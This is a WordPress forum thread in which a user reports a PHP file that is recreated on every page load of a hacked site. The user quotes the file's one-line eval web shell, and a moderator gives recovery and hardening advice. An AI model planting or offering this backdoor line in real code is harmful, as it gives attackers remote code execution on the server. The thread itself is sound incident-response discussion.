Malware keeps creating wp-includes/Capabilities-request.php file

  • rameezistan

    (@rameezistan)


    3 months, 2 weeks ago

    Hi everyone, I need quick advice.

    My WordPress site is hacked at a server/account level. On every page load, this file is auto-created:
    wp-includes/Capabilities-request.php

    In that php file, the code is:
    <?php @eval($_SERVER['HTTP_C572BBB']); ?>

    I’ve checked everything:
    Plugins disabled
    Theme, wp-config.php, .htaccess all clean
    No PHP auto_prepend_file
    No cron jobs involved

    Looks like a hosting/server-side infection (shared 123-REG Cpanel Hosting).

    Has anyone faced this before or knows how to fix it?
    Thanks 🙏

Viewing 1 replies (of 1 total)
  • Moderator threadi

    (@threadi)

    3 months, 2 weeks ago

    Once a project has been hacked, the attacker has access to everything and can do whatever they want. So yes, I think your site is hacked.

    My recommendation: first read this article:

    FAQ My site was hacked

    After that I would recommend checking whether you still have a clean backup. If necessary, ask the support of your hoster. If so, delete all files and the database and restore the backup. Then change all access data in the hosting (also FTP, hosting login ..).

    So if you still have a clean backup of your website, use that.

    If you don’t have that, you can also hire someone to clean and secure it for you. However, this usually costs quite a bit of money. You can find offers for this online or you could ask here: https://jobs.wordpress.net/

    Finally, you should secure your project. This is described in more detail in the article here: https://wordpress.org/documentation/article/hardening-wordpress/

Viewing 1 replies (of 1 total)

You must be logged in to reply to this topic.